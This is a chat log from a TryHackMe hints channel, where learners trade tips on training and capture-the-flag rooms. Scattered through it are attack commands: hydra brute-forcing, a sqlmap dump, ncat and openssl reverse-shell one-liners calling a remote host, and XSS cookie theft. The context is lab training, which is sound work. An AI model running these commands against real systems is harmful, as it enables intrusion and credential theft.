#room-hints
You would specify the port if it wasn't default.
On THM?
its the same result
yes
oh ok xd
Use your own VM, or the attackbox xD
i will try xD thanks
Gave +1 Rep to @sage steeple
It's changed for that task?
Gave +1 Rep to @sage steeple
Hello, I am working on pickle rick. I just wanted to confirm, if steghide requires a passphrase does that mean there is hidden data within an image?
I haven't got the first ingredient yet, but I think it might be hidden in one of the images from /assets
I tried steghide on portal.jpg and it's asking for a passphrase
oh, well that clears that up. thank you lol
Gave +1 Rep to @dusk totem
hi everyone, I have a question related to the "Password Attacks" room, task 8->3 . I used hydra
http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:failed" -f
but does not get right password
however by using the Success conditional string I got the password, could anyone explain HOW?
hello friends, I am working on the pickle rick room but I'd like a hint if possible.
I have viewed page source and obtained the hidden username in html comments
I have used dirb and found the hidden directory
I have scanned all ports with nmap -A and found port 22 open
When I got to this point I was sure I could use the username I found in html and the phrase I found in the hidden directory to ssh into the machine but it didn't work.
I don't want to follow the guide, I want to try and figure it out myself but a hint would be helpful. Thank you.
I did also find a filtered port open, but I'm not sure if it's anything yet
Have you found the ||login|| directory?
Or the ||.txt|| file
I found the file but not the directory
I did run dirb but it didn't get any hit on that directory?
Whats the name of the directory?
I messaged you, I wasn't sure how to hide spoiler the details
Sure
Hello, could someone please give me a hint on anonymous machine?
Need Help!- Do we have any room in THM for DOS/DDOS.
Need to Learn on how to Detect the live DDOS attack or how to read Wireshark File with that details.
Wireshark file you can do Overpass 2
Hi guys bit of a pain on this question, can anyone help? Intro to Networking Task 7 Question 3 facebook.com registration date; I put in the 01/11/2004 and 03/29/1997 date formats and tried them in other ways but it refuses to accept my answer.
Thanks that worked!
Gave +1 Rep to @burnt rivet
Thank you so much, This will help
Gave +1 Rep to @iron wigeon
i need help in the route whatisnetworking-task4-second question
i cant find the answer
alr thx
ok
i read the thing over and over again but i guess i just missed it
hello people. im currently on network services enumerating ftp and this question baffles me. its asking what variant of ftp is running. how do i figure that out lol? please @ me
many thanks in advance
of course i did
all it told me was the ports
unless i should run a full tcp connect
i dunno
oh wait thats a thing isnt it. lemme open the man page
cuz i did verbose
and nothing extra came up
lmao
my bad
forgot the most important switch
-_-
thank you @burnt rivet
Gave +1 Rep to @burnt rivet
anyone have hints for Steel Mountain task 4? every time i try running python 39161.py <ipaddress> <port> i get the message shown in the picture.. I do have an http server and nc session listening but still can't figure out what is happening to get this crash
tried running python2 and 3 and got the same issue... ill have to double check the google search i did for the error apparently haha
where do i download rockyou.txt lol
trying to use hydra but dont have the wordlist
hmm
no idea why its not working
what lab are you working on? It is supposed to be there by default but i have been in 3 rooms that haven't had it
but to answer your question https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
off the top of my head i cant recall the exact ones but they are in the Complete Beginner Path.. its the path im working on now
dont worry
its just that it had a different extension
rockyou.txt.gz
i manually went to the folder to look
thanks again @burnt rivet
Gave +1 Rep to @burnt rivet
you're right once again i am thinking attackbox haha its been a long day
all i know is im going to work on this lab again tomorrow and figure stuff out got to play with the urllib stuff since python split it for python3 and i have to leave the office soon
thanks again for your hint @burnt rivet you always push me in the right direction
Gave +1 Rep to @burnt rivet
ladies and gentlemen. i been at it for a long time and i dunno what to do. What is ftp.txt task 10 in network services
when i try to download the ftp.txt file
it says access denied
but i am logged in and mike
so confusion
help me plz
thanks in advance ❤️
okay i got it
works now -_-
hey guys!
anyone done this room? https://tryhackme.com/room/linprivesc
for the last challenge
should i find all possible pe vectors?
or maybe there are a lot of em that are bait and only one works
well finding all possible pe vectors will help but you only need a couple that actually work to get all the flags
also if you go by using some of the tricks they discuss in this room you will find just a few to be used
need anything specific as a hint???
nah i just needed to know for educational purposes
like it's best if i try and explore everyone of the vectors
for ctfs it helps yes.... for real world pentesting engagements yes of course you need to find all the potential privilege escalation vectors to be able to write them down in your report and help the company patch or prevent them
hey, I am doing the OWASP-Juice-Shop Task4. I am using the AttackMachine and the needed seclists are not installed. Also I cannot install them by "apt-get install seclists". Any ideas? In the Kali-Machine, there is no burp plugin installed. I tried to install it manually and set up the proxy, but it did not intercept properly, for some reason
EDIT: nvm. Found the wordlist. They were just under a different location, than listed in the task
yuups they are in opt instead of /usr/share
if shadow recall correctly
otherwise when you get into this kinda situation the find command is useful to find where things are stored
yeah, that is how I found it, by the find command, thanks
Gave +1 Rep to @alpine kestrel
hey guys , I have been trying to make a progress in network security solutions path , but I can not make it go when I came across with evasion via payload manipulation path , is that anyone who is solve the last question ?
any hints on oh my webserver?
still need help for root on oh my webserver
Hey all, in the "Team" CTF I've found the rsa file, but when I try to use it to SSH in I get the error "invalid format." google is so far unhelpful as to what I'm doing wrong to fix that. Any hints on where to look?
Hey, could you share your id_rsa file?
Also, you gotta verify first to be able to share files here
!docs verify
!docs verify
Working on the verification..
Do you know how now?
Yep, just did it.
Cool.
Remove the first two lines
It should be -
-----BEGIN OPENSSH PRIVATE KEY-----
.
.
.
-----END OPENSSH PRIVATE KEY-----
Looking for very slight hint with foothold for Enterprise
like the most basic possible hint.
I found the ||xlsx and docx files|| but I am kinda stuck on ||how to decrypt them.||
Hi everyone, I have some trouble with a question from Task3 of SNORT room (https://tryhackme.com/room/snort):
According to the official description of the snort, what kind of NIPS is it?
I thought it would be sthg like rule based, but apparently not
Any suggestions?
Hi, what did you do to resolve the issue? I'm banging my head against the wall...
Hey guys, stuck on Burp Suite module Task 13 Qstn 1: failing to find the suspicious page on the site map. What am I missing?
Hi everyone,
Need some assistance here. I cannot see what I am doing wrong here.
I am using sqlmap to get the flag for Task 6 on sqlilab. I am running the command sqlmap -u http://10.10.110.236:5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b --dump
But it is resulting in an error that I cannot seem to get past.
figured it out ..thanks
hey, I am doing this https://tryhackme.com/room/ohmyweb CTF and to get the root.txt should I have to escape the docker
Well, it's not a proper docker escape
Enumerate the host network
Hello everyone, can I get a hint on this room using nmap? I'm on task 14 practical and the question is:
"Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?
There is a reason given for this -- what is it?
Note: The answer will be in your scan results. Think carefully about which switches to use -- and read the hint before asking for help!"
I did the first part and performed the xmas scan using code 'nmap -sX -vv -p 1-999 10.10.187.1' and got the results.
I don't see the answer in the output of the terminal after running this.
hello, looking for a helping hand in the John the Ripper room, task 6...I've unshadowed the file and passed it into John. but it's taking agesssssss, is it supposed to? I followed the instructions exactly. It's only a four character password so I thought it would have been quicker! If I just have to sit and wait that's fine, but I expected a task question to not take forever. Thank you!
never mind, i trashed the attackbox and restarted it, worked instantly!
Anyone did the room called "Intro to Digital Forensics" ? The very first question "Consider the desk in the photo above. In addition to the smartphone, camera, and SD cards, what would be interesting for digital forensics?". I must say I basically ran out of words, and im tired of guessing. A 6 letter word. Any ideas?
It's really obvious...
Im sure it is, im not a native english speaker so its prob a word i never use.
Ok.
i tried stuff like pencil
No..
papers
Think technology.
in the image there are only postit, a pencil, papers, laptop and the three they mentioned it is not
Are you sure?
even look in my response
i even wrote it correctly there.. its those small things that catches me.. hehe.. my spelling
well done ya muppet... +rep
hello friends, i have been on LFI challenge in the pre-security path for a awhile now...and i can't seem to find my way to the flag on challenge 2...please i need hints on how to think in the right direction to solve the problem..thank you
Do you mean the file inclusion room in Jr pentester path? If so have you checked the hint on that question? It should give you direction
Are you using burpsuite?
Hi folks, hope your all well. I wanted a bit of guidance on John. I'm on the John module, specifically the NTLM windows crack.
Using John to find the format #john --list=formats | grep -iF "NTLM" I get a half dozen suggestions. I tried all three that had NTLM in the body; netntlmv2, netntlm, netntlm-naive via the john syntax.
All of them gave me an error.
In checking with the answer expected, I noticed it was **. So I guess it was NT.
Setting up john again; #john --format=nt --wordlist=/home/rockyou.txt /home/ntlm.txt and running gave me the correct mushroom password.
My question is, why does the format checker give me NT as opposed to the others?
Its a full something.
Its a full something
Anybody started the initial access room ? I need hints on task 8
add a link to the room
Good evening 
I'm doing a room provided by my school and I found a file in which it's written :
Help will always be given at Hogwarts to those who ask for it.
I was wondering if it's some sort of meta-hint where i'm supposed to go here or maybe on the school teams to ask ?
I searched the discord for the name of the box and didn't find anything and "Hogwarts" seems to be another unrelated challenge ?
https://tryhackme.com/room/yerawizard
Thanks for the help !
I don't think it's meant to ask here, as usually we do not help with private rooms, especially rooms provided by a school
Oh okay, i'm gonna ask on the teams then, sorry for the inconvenience and thanks for the answer
You can do all three challenges within Dev-Tools
Use Dev-Tool to mod the session
Hello again friends, I am learning gobuster in room CC: Pen Testing, I have a machine deployed, and it wants me to find the hidden directory, but it's not a web app? When I use gobuster dir -w common.txt IP it says URL flag not set, so I put -u before the IP and it says it cant connect? It also doesn't appear to be a web app as I can't load the URL in my browser.
I'm working on the "Network Services" room. I'm on task 4 and attempting the following question:
Lets see if our interesting share has been configured to allow anonymous access, I.E it doesn't require authentication to view the files. We can do this easily by:
- using the username "Anonymous"
- connecting to the share we found during the enumeration stage
- and not supplying a password.
Does the share allow anonymous access? Y/N?
When I try to connect I get the error tree connect failed: NT_STATUS_BAD_NETWORK_NAME and I'm attempting to use the following command to access the SMB share: smbclient //ip-address/POLOSMB -U anonymous Can anyone point out where my error is with the provided information or is more information needed?
I've tried with the "A" in anonymous capitalized and not capitalized.
the share that you are trying to connect is wrong and does not exist, you need to enumerate the SMB to find the share
the gobuster part has a separate machine, make sure you are not on the wrong machine and if you can't load the page try restarting the machine because that machine only has port 80 open
Hey guys I am doing the room (Part 3 Linux Fundamentals) where you have to use the wget command to download a file I have completed:
- Ensure you are connected to the deployed instance (10.10.26.217)
- Now, use Python 3's "HTTPServer"
struggling to get access to file
I have tried the following command with no luck: wget http://10.10.26.217:8000/.flag.txt
which task and question
hey @terse nova its part 3 task 4 - Downloading Files
so are you connected via ssh to the machine
Ahhh i think that might be it thanks I will try now..
Gave +1 Rep to @terse nova
Hi, thank you. I since found that it may have been a problem with my openvpn connection, it seemed to be connected (when I checked through thm) but I closed and opened the connection again and now I can view the website.
Gave +1 Rep to @terse nova
you can check your connection by curl 10.10.10.10/whoami
thanks
what is the purpose of this command… python -c 'import pty;pty.spawn("/bin/bash")'
can see it was used in a walkthrough after creating a session through metasploit
It spawns shell (bash) and attaches your stdin/out to it
Hi all
In Overpass 2 - Hacked , i dont connect to ssh port 2222 , i received error Unable to negotiate with 10.10.122.175 port 2222: no matching host key type found. Their offer: ssh-rsa
Can help me ?
ssh user@ip -p 2222
Try adding that -oHostKeyAlgorithms=+ssh-rsa
Its work, whats the problem ?
thanks
I think in newer versions of openssh that host key type is deprecated
ok, tks
Stdin/ ???
yes
I'm not an expert in cryptography nor with ssh, but I think you misinterpret that, maybe read on that to understand what's being deprecated: https://levelup.gitconnected.com/demystifying-ssh-rsa-in-openssh-deprecation-notice-22feb1b52acd
oh yeah that explains it a lot better... thanks fontaene
Gave +1 Rep to @left thunder
it basically states that SHA1 is being detracted for use as a hashing and signature method for ssh and that happens a lot with the old ssh-rsa thingy and will be fixed by updating it
can someone tell me why everytime i login thru rdp i get reconnecting attempt (on several machines) and it won't let me connect can someone tell me why please?
Which room, are you on the attackbox or your own machine ?
my own machine
box is the sequel to ice ( blaster if i remember this right)
i also use remmina
And which task are you on ?
i closed my pc right now cuz i got headaches all day on pc but i think it's one of the firsts tasks where it asks u to open the rdp to get some files
Oh, so you not actually trying and the target machine is shut down also? As it's anyways hard to troubleshoot if you are not at it right now
i tried several minutes ago but i got tired cuz of the reconnecting attempt and closed it
i tried it while the machine is online
Ok, well I then suggest you ask again once you are at it, as like I said, hard to troubleshoot if everything is shut down
haha okay thanks Although bro!
Thank you! I think I found what I was looking for.
Gave +1 Rep to @terse nova
congratz
Thank you. Figuring out how to open the file was a different story... Found an easy answer on THM forums but I don't think I woulda found the "get" command without it. Maybe I learned it previously and forgot.. :shrugs: I did take 4 months off from this lol
fundamentals part 2, Task 5, question 1: "On the deployable machine, who is the owner of "important"? // ls -l filename . # not sure where to go from here
In case of that screenshot, the owner would be cmnatic, so apply that to the target machine you are on.
Hi Guys am doing the web fundamentals module and working on the OWASP ZAP room. my issue is I cant seem to get the brute force page. Instructions say I should go to http://10.10.191.231/ where the page appears on the side panel directory. Instead,if I access http://10.10.191.231/ it redirects to https://10.10.191.231/login.php so even when fuzzing I think I am fuzzing the wrong page. Answer I am trying to get is for Task 8 of https://tryhackme.com/room/learnowaspzap. Please help
Can I access your target machines webapp to see myself?
yes please
Hey guys, I'm doing wreath network and im currently on the webserver exploitation stage, my issue is that, the question is asking for root users password hash, but once i enter the hash i got from the shadow file it says incorrect answer
#wreath-network and plz try to follow the provided videos
Okay thanks
You have to login to the webapp first with the creds provided in task 6, after that you can navigate to the page needed for task 8. Note that you have to capture a request while being logged in.
thanks @left thunder - let me do that and provide feedback
Gave +1 Rep to @left thunder
that was my mistake indeed...many thanks!
hey, you might want to verify your profile, to get roles, gif embeds, post screenshots .etc., :)
!docs verify
done thanks
Gave +1 Rep to @cedar anvil
Hey team, am on LFI task 2 last qstn: my issue is this invalid format I am getting....my permissions are good (600) but im stuck...any pointers?
uhmmm I even re-copied and pasted but still no change
any special way to do it from browser to file?
many thanks @burnt rivet - that did the trick!
Gave +1 Rep to @burnt rivet
Hey Team, so im doing the LFI Walkthrough room(https://tryhackme.com/room/lfi#). I enumerated the system using the LinEnum script then went to GTFO to look for binaries that can help me privilege escalate for all files with s-bit set. Got nothing, whats my next step from here?
I have not done that room, but have you answered question 1 of task 3 ?
Good afternoon, I am running into issues on the Authentication Bypass Brute Force room. The ffuf cmd on task 3 won't get past an error. I did solve task 2 and saved the file just can't get past 3. Any hints to my syntax for the cmd?
yes I have
The file is a the correct name from the previous task .txt it is just the names that were found. The errors and the syntax are in the screen capture.
o
Okay, and by what you have found, did you search for it on gtfobins ?
And what's the error you get? Probably best to share a screenshot. You will have to verify first in order to send screenshots.
!docs verify
so these are the SUID files I got:
[-] SUID files:
-rwsr-sr-x 1 root root 109432 Oct 30 2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 44528 Mar 23 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 59640 Mar 23 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 149080 Oct 11 2019 /usr/bin/sudo
-rwsr-xr-x 1 root root 76496 Mar 23 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 40344 Mar 23 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75824 Mar 23 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 37136 Mar 23 2019 /usr/bin/newuidmap
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwsr-xr-x 1 root root 37136 Mar 23 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Aug 23 2019 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 26696 Aug 23 2019 /bin/umount
-rwsr-xr-x 1 root root 44664 Mar 23 2019 /bin/su
I then cross-checked the files with any of them on gtfobins in order to get one with the s-bit set. I got no hits...so not sure how I will escalate to root and get the flag....
I'm talking about what you have found to answer question 1, did you search that answer on gtfobins ?
yes I did get a hit for it...but it has no SUID function. so im not sure how to pull it off
But it has sudo
And question 1 was about what the falcon user can run with sudo/root
so my thinking is I have to run a script from gtfobins..check myuser account change from falcon to root....navigate the directory and get my root flag. I might not be understanding the requirements then...
Well, gtfobins is providing you the commands/steps you have to follow to escalate your privileges. So did you try to follow the steps provided ?
There is no script to run whatsoever
understood...no I had not..let me do that
thank you @left thunder - I have succeeded!
Gave +1 Rep to @left thunder
c
has anyone solved shodan.io room !!
I am not able to find answer of "What is the top operating system for MYSQL servers in Google's ASN? "
yes I have tried : 5.6.40-84.0-log (wrong answer)
What solved it? lol! I'm still getting the same unresponsive screen on the attacker side. So Let me get this straight, ncat -lvnp 1234 -e /bin/bash on the attacker side, and ncat ipnumber 1234 on the victim side correct? Did you need to encode the victim's string with base64 or anything to mask it from the IDS/IPS before hand?
Hey guys, I've been having issues with the authentication bypass room for the Jr Penetration tester path, specifically the brute force section. In the section we have to use a file with usernames that were found with ffuf in the previous section, however when I run the command to try and find the password for the those usernames I don't get any results back. Any idea what I am doing wrong?
Can you verify and send a screenshot please?
!docs verify
Hello!
In the windows fundamentals 1 room there's a question that goes "Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?" I am out of options. What is it?!
Any hints? There's an icon that doesn't even render on the virtual machine.
There is a brief documentation linked about the Notification Area, did you read that already ?
Hey, I'm in the Brainstorm room and can't really figure out why my fuzzer script won't work. If anyone has solved it and are willing to help it'd be appreciated
Please verify and send a screenshot
!docs verify
ok done
howdy. Im doing a wordpress theme editor exploit. I saved my php rev shell to a theme file (404). I forget how to navigate to it to call the shell. anyone remember?
found it
Yup yup, that did it
Room: https://tryhackme.com/room/webfundamentals
Section: Task 3, question 4.
Question asks: "What's the status code for 'I'm a teapot'?".
The hint it gives speaks of the Mozilla page, I don't understand though. Can somebody lead me in the right direction, please.
Blue room, cant find flag2 even did "search -f flag2.txt
looked at a video to see if i was missing something and found out what location the flags supposed to be in and its not there
ive restarted the machine 3 times
well i found out the answer because of the video but i still wanna know why it was missing
unless i got unlucky and it deleted it 3 times
Follow the link to Mozilla's documentation page provided in the responses section of that task https://developer.mozilla.org/en-US/docs/Web/HTTP/Status and you will find the answer in there
Can anyone give me a nudge on the Room nerd-herd?
Yeh, where are you stuck?
You should have the encrypted password as well
Hints are : key is in the video you found
The encrypted text is a cipher
Yeh, missed it when I did it too
Got it, Thank you @cedar anvil
Gave +1 Rep to @cedar anvil
anyone wanna give me some advice?
this script would take one minute to get executed ikr?
FFUF isn't able to find any Subdomains while fuzzing in CMess box. Is there a particular reason for this?
ffuf -w <wordlist>:FUZZ -u http://something.thm This is command I used
try this:
wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt -u "http://<domain_name>/" -H "Host: FUZZ.<domain_name>"
Ohhh Vhost fuzz?
remember for finding sub-domains, you need to add a domain in your /etc/hosts
Yeahh I did that, Using -H flag might just work I guess
yeh, normally I'd recommend gobuster as that is really nice for dns or vhosts
Yeah I did try dns in Gobuster but still didn't work.
But dns won't work here on THM
shush
Subdomain on the same IP is known as a vhost yeah XD
If you keep correcting every little thing I type, I'll die 
Yeah, the Host header.
GET / HTTP/1.0
Host: <vhost>
.
.
.
Hey. I'm stuck in Broken Authentication task in OWASP Top 10. I'm doing as stated register " darren", fill mail n password. Then Sign in, but no luck. Can someone give a hint or DM me where I went wrong....
is there any room about servers and P2P
If you find one DM me plz
Have you registered the name with the quotation marks ?
Yes
The quotation marks are just there so that you can see that there is a space in front of the username, you are not supposed to actually register the account with these marks
Thanks @left thunder.
Gave +1 Rep to @left thunder
check Extending Your Network room
thx
Gave +1 Rep to @humble cave
anyone wanna give me a hint on how im supposed to use the scripts on the startup room
everything i try i dont have perms
lennie
already tried editing /etc/sudoers with it but it said permission denied
wdym
ok give me a couple minutes
yeah dont know how im supposed to use print.sh for escalation since im the owner of it
tried using it to cat /root/root.txt
when i execute it just says permisson denied
when it starts print.sh
ik
when i checked crontab there was nothing executing it tho
that is a part i missed
I understood that part im just trying to find the cronjob
i ran linpeas.sh but didnt find anything, want does pspy64 do differently?
yeah im reading the github page
im just wondering why i couldn't see the cronjob but pspy64 can, so if i couldn't use pspy64 how could i figure out there was a cronjob
went through both /etc/crontab and /etc/cron.d and nothing stuck out to me.
finished the room but will need to go over again sometime
thank you @white salmon
Gave +1 Rep to @dusk totem
Hey! Sorry to bother you guys, but I am having trouble with a room, and I'm not sure if I'm missing something.
In the Encryption - Crypto 101 room, Task 8's question seems like it should be the easiest thing on THM so far (Who is TryHackMe's HTTPS certificate issued by?) but when I enter in what I believe is the correct answer, I'm getting an incorrect response.
Thoughts??
The certificate may have changed?
I checked some older walkthroughs which had a different answer for that field, so I'm sure it has changed over time, but it looks like it's not taking the current issuer ... unless I'm being MITM'd
No, the answer will be set to what it was before, it won't change in real time to reflect the certificate change, if it that's what's causing it.
nope that is the actual one
That's the actual cert.
from shadows ubuntu machine without an antivirus
seems the room needs an update then
Perfect timing
or at least shadow assumes their ubuntu machine is not getting MITM'd
if it is shadow is spooked
Does your Cert have 25/3/22?
2021-03-25 as the start date and 2021-06-23 as the end date
Yup
also lets encrypt
It seems to be something new with lets encrypt
https://letsencrypt.org/certificates/
so it matches the other people in here hence assuming it is fine
It is.
The old answer should work if you have it.
If not, I can give you it.
Unless James changes the answer.
well guess we can leave a report in room-bugs about it now
It looks like it's looking for a 2 char answer, and the hint says it's not either of the answers that would be in the older walkthroughs ||Cloudflare or Let's Encrypt||
yeah but as kinda proven by us now it has actually changed
Ah, got it! Read the link that @left thunder posted and found what I needed. Thank you!
Gave +1 Rep to @left thunder
+rep @white salmon
Gave +1 Rep to @sage steeple
well then time to call it a night
So that no one will be left behind +rep @alpine kestrel
Gave +1 Rep to @alpine kestrel
oh thanks for that @left thunder
Gave +1 Rep to @left thunder
hey in cc pentest room last task i found a hidden directory called secret but im unsure of what to do next. Not sure which of the tools from the room are applicable
this is my furthest progress
Did you visit it?
Perhaps, you may find some secret there
wdym by visit
It's a Web server, isn't it. You can visit it in the browser
Okay thanks @sturdy hearth
Gave +1 Rep to @sturdy hearth
why its not starting?
Is that your personal system or a deployed machine from THM?
I don't think you should be starting firefox.service, it isn't a service.
e.g. apache2.service, fail2ban.service, syslog.service are services.
It doesn't exist
as u can see my username its personal
oh ok thank u
Gave +1 Rep to @sturdy hearth
what does instance mean?
.
"on the deployed machine" in other words
oh ok thanks
Gave +1 Rep to @left thunder
heyy, I'm doing the Relevant room, and I don't seem to find a way to get access. Can it be eternal-blue and i just fuck it up?
Is there like any service I should focus on more?
"Network Services", any hint on how to guess the username on Task 4 exploiting SMB ?
hi can anyone give me a clue
im on my way to the second ingredient
well
since the
clue says look around the filesystem
i checked every file
or smth like this
checked the html pages
there is a comment
oh jeah etc
thanks
quite not sure what to do with that comment
which would be a good place to start to find out what the algorithm is
ahhh base 64
so i kinda decoded it? haha
ill do thanks
stuck on NETWORK SERVICES 2 room
will continue when i get home from dinner but i am wondering if anyone is willing to do a full walkthrough with me as i dont understand where i am going wrong!
i am a COMPLETE BEGINNER
super super novice
the enumerating task. do i need to use the tryhackme attack box or should i be using a VM or something
it wont nmap properly
ive used write ups but dont understand where i am messing up
on network services 2 room
task 3
NFS
nmap -A -p- IP -vv
shows me 4 ports but im supposed to see 7 according to the answer
anyway will return later, thank you lassi
Burpsuite Help.
When I type in the IP address of the virtual machine into the firefox url it does not take me to the OWASP juice shop. I get an error instead.
So what's the error?
the web page just says error 404
Show a screenshot please with the error so that also the url bar can be seen
how do I get the OWASP juice page to show up?
Hello everyone, any nudge on wonderland room?
hey, i can run openssl as root using doas command and i am suppose to get a reverse shell using this command mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | doas openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s but i am getting the reverse shell as the user i am running this command any solution ?
doesnt work man
You're supposed to use RDP as specified in task 1?
Or you could use the browser version
Attempting XSS in room OWASP Juice Shop. The directions are as followed:
But the header in Burp does not appear the same. Even when I manually input the header line they ask, it doesn't seem to work.
this SS does not have my input. It's just the first one that comes up, untouched.
I just input the extra line True-Client-IP and then forward it.
yes. doesn't seem to work
Okay
the last line I had the input. theres no true client ip in the header when it's initially caught, so i inserted it.
I did not enter "Do Not Track"... that wasn't in there, either but I just left it as-is
and just inserted the string for the XSS
there's the original. It's only 1 line difference
Did you try to add that extra line?
"DNT"?
yeah. doesn't seem to have any effect
tried it with and without
idk man...
it's a super-simple task. idk why it's not working
What about you highlight the whole header value and url encode it with CTRL + U ?
Other than that I guess I would have to try it on my own
that doesn't seem to work, either. I thought that it might.
Can I try to access your target machine ?
sure. np
Okay, was working fine for me
After you edited the request, what was your next step?
I released the interceptor and allowed the requests to run through.
logged back in and continued to the Last IP page
Did I miss another request?
Well, show me a screenshot of your full and correct request right before releasing intercept pls
wait... it did work...
but the XSS popup didn't work... I got the code
I'm very confused now

Maybe you got it because I did it before
No just tried it with only releasing, should work fine
But again I don't see 2 new lines at the end
what would the 2nd line be?
Nothing, just an empty line
Okay... that was the issue. They never explained that and I'm brand new to http.
thank you. much appreciated.
I just don't understand why it was necessary to add 2 lines
shit... I didn't get the code that time..
I think that determines where the headers end and where the body begins
Ohhhh
I see
thank you... now, i'm not getting the code a second time.
what have i done
I didn't want to cheat so I closed the flag
i'll have to restart the machine... f
You can get it at the end of the task from the scoreboard
In case you didn't already restart it
In Internal room- logged in to the wordpress website. And found another credentials for something else. any hints what to do next?
i can edit the site, which gives me xss exploit. themes and plugins are protected from writing
i guess i'm not seeing something
i get this message on every file i wanna edit:You need to make this file writable before you can save your changes. See Changing File Permissions for more information.
Can i have help with the Rocket room please?
Hi, I'm working on the Windows Internals room (https://tryhackme.com/room/windowsinternals) and I'm stuck on the first question of Task 2. I searched for Procmon on the Windows machine but couldn't find it and I can't download it either since Explorer doesn't seem to be working. What am I missing? :o
Hi everybody,
I'm trying to make this room https://tryhackme.com/room/smaggrotto
But i can't get access to ||http://development.smag.thm/login.php|| is it normal?
Maybe i'm not on the good way x)
No, so ok i think i must try to do this
Thank you
Gave +1 Rep to @dusk totem
Hi, for room (https://tryhackme.com/room/networkservices) Task 6, I answer all the previous questions but this one I don't understand what's asked really.
Based on the title returned to us, what do we think this port could be used for?
what title ? the one on the open port ? because I don't see one
Run a more advanced scan on the open port you found, a basic scan won't reveal it
Thanks I will try
Gave +1 Rep to @left thunder
hey, i am doing a room where we have to exploit lfi i have got the code (PHP) any hints what should i do afterwards
don't mind i just found the way :)) btw the room is https://tryhackme.com/room/archangel
sorry in advance for the dumb question. I am in active directory basics room. the first question is asking me what's the windows 10 operating system on the machine.. I have checked system info it seems to be windows server 2019 standard, but this isn't the correct answer. I know I'm doing something dumb, any tips welcome. thanks.
2019 is not Windows 10.
But it could be the long version number. Something like 10.2039.49485833
The build number
20H2 Build number: 19042
That's just generic. I haven't done this room
I'll try that, the syntax for the answer is 7 x * and then 2 x * and then 10 x * etc
I am sure it is windows 10 something something
I tried enterprise edition as a guess but no good
Check msinfo
i run msinfo32 I get OS version microsoft windows server 2019 standard
I'm sure I'll facepalm when I find the answer
Which task is this?
active directory basics hands on lab
active directory basics is the room
hands on lab is the task
Found it. It looks like it starts with ||Windows 10||
Have you tried the suggested command?
||Get-NetComputer -fulldata | select operatingsystem||
The server is unreachable for me
it's not case sensitive right? thanks for the help btw
idk why I'm having so much trouble with windows and powershell
go on...
Did you set up powerview?
I got it. Powerview is the key to the entire thing. It's all in the part above the task. they just don't make it obvious
thanks very much
Gave +1 Rep to @vernal basin
I'll go back up and try again
Anytime. Thanks for pointing out the room. It's now on my list.
Gave +1 Rep to @muted siren
urgent need of help on task 7 please, my head cant take anymore head banging against the keyboard
https://tryhackme.com/room/opsec
Then take a break
Cheers I did a 12hr break and still no joy!
Hey guys I am doing an easy room (Cyborg) and all I am looking for is what I am doing wrong with this certain part. I discovered the hash and using JTR to try to crack the hash using rockyou and I am absolutely getting nothing. I went through walkthrough only to see if others are doing what I am and they seem to be getting the pw. I used "john --wordlist=/usr/share/wordlists/rockyou.txt.gz <filename>"
and it completes without cracking the hash.
I think the rockyou.txt.gz is the problem because I did notice I was the only one having that file with .gz at the end
send screenshots
U are meant to use a file format which is rockyou.txt
Or try unzipping it
let me try this thing real quick, downloading a different rockyou list because I have had this issue before with the list that comes with the kali linux vm
oh I haven't tried that
Then try it buh u should unzip it as root
Good night y'all
Just wanna take a one hour break
Alright
Hello everyone, I'm in room Windows Internals, task 5. Has anyone done it? Please
rock.txt.gz is a gzip file
gotta unzip it
yeah I have never worked with a gz file before and no idea I had to use gzip. Much appreciated.
gzip -d <file>
Yeah got it working and finished the room
Anyone? I did what the instructions said but the answer I get is not correct
urgent need of help on task 7 please, just need the layout of the answer explained please?
https://tryhackme.com/room/opsec (edited)
@Kiru#5962
Hi
im attempting the Networking room and am stuck on a question
"What kind of Protocol is TCP?"
I have done all of the other questions and find myself stuck on this one, i've re read the whole section again and again and tried researching it
Transport layer?
no
What is the room url?
Which task?
ive read the text over and over
@! Kiru
Any help with Cross-site Scripting Room https://tryhackme.com/romm/xssgi will be appreciated. What is meant by "staff-session cookie". I can get a cookie but it's not the right one as it's for the ticket I just created. TIA
You have to wait for the automation behind to open the ticket as a staff member, otherwise you only get your own session cookie
Hi, not sure how to report this but i think the Wireshark101 room is wrong?
If you don't receive it after 1 - 2 mins and you sure your payload is working (like you verified by receiving your own session cookie), restart the target machine
@left thunder Thank you! I think that room could have been clearer. What you are saying makes perfect sense. Thanks again!
Gave +1 Rep to @left thunder
If something is wrong with a room, it's in #room-bugs to report
thanks
Gave +1 Rep to @left thunder
@left thunder By "restart the target machine", do you mean "Terminate" the current target machine and "Start" a new target machine?
Yes
